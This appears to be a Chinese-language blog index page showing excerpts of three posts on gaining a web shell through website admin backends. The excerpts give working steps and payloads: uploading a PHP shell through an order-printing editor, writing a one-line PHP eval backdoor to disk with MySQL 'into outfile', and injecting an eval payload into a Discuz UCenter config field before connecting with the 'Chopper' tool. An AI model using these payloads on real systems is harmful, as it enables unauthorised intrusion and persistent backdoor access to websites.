后台拿shell | 熊猫博客
  • 方法一、 进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images/upload/Media/xx.php 方法二、 后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,...
    作者:熊猫| 发布:2014年2月26日| 阅读:6,725次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • 首先用暴路径漏洞找到绝对路径,然后替换下面的路径 随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell) Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile 'D:\www\dmtz\bbs\upload\phpmyadmin\eval.php'; Drop TABLE IF EXISTS a; 这是我们的后门 http://xxx.com/ph...
    作者:熊猫| 发布:2014年2月21日| 阅读:4,699次| 分类:PHP, 漏洞列表, 编程语言| 标签:, ,
  • 首先你应该得到管理员的用户名和密码,若密码最好不过了,如果实在找不到找好去找一下老密。密码都得到了以后,进入后台,直接在UCenter IP 地址(站长--ucenter设置): 里面插入一句话  xxoo\\');eval($_POST[a])?>;// 就ok 然后菜刀连接http://www.xxoo.com/config/config_ucenter.php 密码a。 现在这个漏洞应该大部分的网站都不存在了。
    作者:熊猫| 发布:2014年2月21日| 阅读:3,542次| 分类:PHP, 漏洞列表, 编程语言| 标签:,